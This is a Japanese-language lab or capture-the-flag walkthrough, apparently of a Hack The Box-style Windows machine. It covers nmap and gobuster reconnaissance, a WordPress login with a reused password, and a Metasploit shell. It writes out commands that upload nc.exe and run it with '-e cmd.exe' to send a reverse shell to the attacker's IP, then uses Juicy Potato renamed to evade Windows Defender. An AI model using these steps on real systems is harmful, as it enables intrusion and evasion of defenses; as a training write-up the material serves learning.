まずnmapから
httpとmysqlサーバーが稼働しています。まずサイトにアクセスすると
windows公式のサイトでしょうか。試しにwelcomeを押しても別の公式サイトに飛ばされます。gobusterを使って調べてみましょう。
wordpressがあるようです。アクセスしてみると
自動車?のブログのようです。サイトを見てみるとblogのページがあり、さらにloginページが見つかります。
ここで今までのboxで手に入れたパスワードを使ってみるとadmin:P@s5w0rd!でログインすることができました。
ユーザーネームとパスワードが揃ったのでmetasploitでリバースシェルを得ることができます。msfconsoleを起動しwordpress admin shellで検索して、use 0で使います。
以下のように設定(それぞれsetで設定しましょう)
成功しました!対象がwindowsなのでリバースシェルを得るためにnc.exeをアップロードします。https://github.com/int0x33/nc.exe からダウンロードし解凍、nc.exeをダウンロードフォルダに入れます。
次にmsfconsoleでnc.exeがあるフォルダを設定しターゲットにアップロードします。その後ターゲットでnc.exeを起動します。別ターミナルでncしておくのを忘れないようにしましょう(なおポートはnc.exeのデフォルト)。これでリバースシェルが得られます。
lcd /home/ユーザー/Downloads
cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
upload nc.exe
execute -f nc.exe - "-e cmd.exe <自分のIP> 1234"
次に特権昇格を狙いましょう。msfconsoleでsysinfoすると
どうやら古いバージョンを使用しているようです。これをもとにexploitを探すとjuicy_potato(https://github.com/ohpe/juicy-potato/releases)というものが見つかります。これを使用しましょう。githubからダウンロードし名前を変更します(ターゲットのwindows defenderではじかれるため)。先ほどのnc.exe同様にアップロードして
ターゲットでリバースシェル用のスクリプトを作成。
さらに別ターミナルでポート1111(juicypotatoのデフォルト)を開きターゲットでjuicypotatoを起動します。すると
root権限が得られました!デスクトップからroot.txtを入手できます。
ブログを作成するにあたり公式walkthroughと下記サイトを参考にしました。